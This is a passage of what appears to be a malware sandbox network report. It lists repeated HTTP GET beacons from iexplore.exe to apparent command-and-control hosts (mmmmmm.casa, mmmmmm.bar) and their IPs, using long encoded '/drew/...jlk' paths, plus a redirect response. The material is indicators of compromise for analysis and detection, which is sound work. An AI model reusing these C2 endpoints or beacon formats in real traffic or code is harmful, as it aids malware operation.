                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            23192.168.2.649855198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:15.255676985 CET12670OUTGET /drew/j7oozYYr4G/bYPRbLJriJS4feBdG/0xgI6EEeE0Qo/2gCtlKjoc_2/B1hFK5PzTlAsos/iTaAVzPWNav1dGzFBSySy/UxAr96PjZyJmtdFK/fjXwxJmbivWIGIY/yq5Vv8AYxEn49XkMGs/TubtjJpWE/75uowT9qAGrZ7hMQc0Ie/MC9oDaNtwMfoejZWEbQ/liHrTgwmRg6JEzsf_2FWS5/OEyBJ8_2Ft152/RzvfDI58/dRQYeFOH3wNaXYh/y.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            24192.168.2.649857198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:15.256762028 CET12671OUTGET /drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            25192.168.2.649853198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:15.312347889 CET12672OUTGET /drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            26192.168.2.649856198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:15.431627989 CET12672OUTGET /drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            27192.168.2.649858198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:15.666459084 CET12674OUTGET /drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            28192.168.2.649860198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:15.785577059 CET12675OUTGET /drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            29192.168.2.649859198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:15.839485884 CET12675OUTGET /drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.2.64976731.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:10:59.650343895 CET1203OUTGET /drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5aD/_2BaeC5gue46teo/Mz94QcIObLwkCmIFSe/AYyEx_2Ft/7flnx_2FeBMaKdb_2BZY/2QcUQ0KczFWXmzcms2u/KqZ09beQmNbj50XJX6IPpt/L8avESS6Nbmyi/27IxeLE_/2B4eudEcqYK8iUY7pnK_2BN/lez_2F9d6B/JO7dBHKHEfmL4H2lk/EeykEsbEse/f.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            30192.168.2.649861198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:15.962327957 CET12676OUTGET /drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            31192.168.2.649862198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:16.195594072 CET12677OUTGET /drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            32192.168.2.649864198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:16.440665960 CET12678OUTGET /drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            33192.168.2.649863198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:16.446784019 CET12679OUTGET /drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            34192.168.2.649865198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:16.636423111 CET12680OUTGET /drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            35192.168.2.649868198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:16.796150923 CET12687OUTGET /drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            36192.168.2.649870198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:16.988873005 CET12688OUTGET /drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            37192.168.2.649892162.255.119.21980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:38.854723930 CET12747OUTGET /drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6emUe/8f2byiiXmsgN0FOY/8Np4qve4hjQoEFD/XyOmPI51BshmpbifBl/PhnltLMaU/pytrkMPObO5JKeAX5_2B/oKM3XwsZzkfZrPMMA4b/Y3eQjnWspYCURHfqjDSMKR/4kDNd4ZxT1b9B/WruvkEy6/DAkBsWEQ0Q5FnusESy1UZQh/tGBZx.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Jan 12, 2022 11:12:39.044420958 CET12750INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:12:38 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 313
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6emUe/8f2byiiXmsgN0FOY/8Np4qve4hjQoEFD/XyOmPI51BshmpbifBl/PhnltLMaU/pytrkMPObO5JKeAX5_2B/oKM3XwsZzkfZrPMMA4b/Y3eQjnWspYCURHfqjDSMKR/4kDNd4ZxT1b9B/WruvkEy6/DAkBsWEQ0Q5FnusESy1UZQh/tGBZx.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 4b 49 6c 74 4c 4c 61 63 33 73 34 35 53 36 49 32 73 2f 5f 32 42 31 57 71 63 5f 32 42 35 63 2f 45 4b 79 34 63 36 69 56 63 47 72 2f 72 6f 45 56 6f 45 74 63 34 73 36 4b 4a 47 2f 4c 61 48 72 32 61 71 69 56 53 69 53 49 5f 32 46 36 65 6d 55 65 2f 38 66 32 62 79 69 69 58 6d 73 67 4e 30 46 4f 59 2f 38 4e 70 34 71 76 65 34 68 6a 51 6f 45 46 44 2f 58 79 4f 6d 50 49 35 31 42 73 68 6d 70 62 69 66 42 6c 2f 50 68 6e 6c 74 4c 4d 61 55 2f 70 79 74 72 6b 4d 50 4f 62 4f 35 4a 4b 65 41 58 35 5f 32 42 2f 6f 4b 4d 33 58 77 73 5a 7a 6b 66 5a 72 50 4d 4d 41 34 62 2f 59 33 65 51 6a 6e 57 73 70 59 43 55 52 48 66 71 6a 44 53 4d 4b 52 2f 34 6b 44 4e 64 34 5a 78 54 31 62 39 42 2f 57 72 75 76 6b 45 79 36 2f 44 41 6b 42 73 57 45 51 30 51 35 46 6e 75 73 45 53 79 31 55 5a 51 68 2f 74 47 42 5a 78 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6emUe/8f2byiiXmsgN0FOY/8Np4qve4hjQoEFD/XyOmPI51BshmpbifBl/PhnltLMaU/pytrkMPObO5JKeAX5_2B/oKM3XwsZzkfZrPMMA4b/Y3eQjnWspYCURHfqjDSMKR/4kDNd4ZxT1b9B/WruvkEy6/DAkBsWEQ0Q5FnusESy1UZQh/tGBZx.jlk'>Found</a>.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            38192.168.2.649898198.54.117.21080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:40.263113976 CET12757OUTGET /drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6emUe/8f2byiiXmsgN0FOY/8Np4qve4hjQoEFD/XyOmPI51BshmpbifBl/PhnltLMaU/pytrkMPObO5JKeAX5_2B/oKM3XwsZzkfZrPMMA4b/Y3eQjnWspYCURHfqjDSMKR/4kDNd4ZxT1b9B/WruvkEy6/DAkBsWEQ0Q5FnusESy1UZQh/tGBZx.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            39192.168.2.649897198.54.117.21080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:40.439151049 CET12758OUTGET /drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6emUe/8f2byiiXmsgN0FOY/8Np4qve4hjQoEFD/XyOmPI51BshmpbifBl/PhnltLMaU/pytrkMPObO5JKeAX5_2B/oKM3XwsZzkfZrPMMA4b/Y3eQjnWspYCURHfqjDSMKR/4kDNd4ZxT1b9B/WruvkEy6/DAkBsWEQ0Q5FnusESy1UZQh/tGBZx.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            4192.168.2.64977031.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:10:59.779408932 CET1205OUTGET /drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5aD/_2BaeC5gue46teo/Mz94QcIObLwkCmIFSe/AYyEx_2Ft/7flnx_2FeBMaKdb_2BZY/2QcUQ0KczFWXmzcms2u/KqZ09beQmNbj50XJX6IPpt/L8avESS6Nbmyi/27IxeLE_/2B4eudEcqYK8iUY7pnK_2BN/lez_2F9d6B/JO7dBHKHEfmL4H2lk/EeykEsbEse/f.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            40192.168.2.649900198.54.117.21080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:40.802408934 CET12762OUTGET /drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6emUe/8f2byiiXmsgN0FOY/8Np4qve4hjQoEFD/XyOmPI51BshmpbifBl/PhnltLMaU/pytrkMPObO5JKeAX5_2B/oKM3XwsZzkfZrPMMA4b/Y3eQjnWspYCURHfqjDSMKR/4kDNd4ZxT1b9B/WruvkEy6/DAkBsWEQ0Q5FnusESy1UZQh/tGBZx.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            41192.168.2.649901198.54.117.21080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:40.978363037 CET12765OUTGET /drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6emUe/8f2byiiXmsgN0FOY/8Np4qve4hjQoEFD/XyOmPI51BshmpbifBl/PhnltLMaU/pytrkMPObO5JKeAX5_2B/oKM3XwsZzkfZrPMMA4b/Y3eQjnWspYCURHfqjDSMKR/4kDNd4ZxT1b9B/WruvkEy6/DAkBsWEQ0Q5FnusESy1UZQh/tGBZx.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            42192.168.2.649905198.54.117.21080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:41.338093042 CET12769OUTGET /drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6emUe/8f2byiiXmsgN0FOY/8Np4qve4hjQoEFD/XyOmPI51BshmpbifBl/PhnltLMaU/pytrkMPObO5JKeAX5_2B/oKM3XwsZzkfZrPMMA4b/Y3eQjnWspYCURHfqjDSMKR/4kDNd4ZxT1b9B/WruvkEy6/DAkBsWEQ0Q5FnusESy1UZQh/tGBZx.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            43192.168.2.649904198.54.117.21080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:41.511205912 CET12769OUTGET /drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6emUe/8f2byiiXmsgN0FOY/8Np4qve4hjQoEFD/XyOmPI51BshmpbifBl/PhnltLMaU/pytrkMPObO5JKeAX5_2B/oKM3XwsZzkfZrPMMA4b/Y3eQjnWspYCURHfqjDSMKR/4kDNd4ZxT1b9B/WruvkEy6/DAkBsWEQ0Q5FnusESy1UZQh/tGBZx.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            44192.168.2.649906198.54.117.21080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:41.882502079 CET12770OUTGET /drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6emUe/8f2byiiXmsgN0FOY/8Np4qve4hjQoEFD/XyOmPI51BshmpbifBl/PhnltLMaU/pytrkMPObO5JKeAX5_2B/oKM3XwsZzkfZrPMMA4b/Y3eQjnWspYCURHfqjDSMKR/4kDNd4ZxT1b9B/WruvkEy6/DAkBsWEQ0Q5FnusESy1UZQh/tGBZx.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            45192.168.2.64990831.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
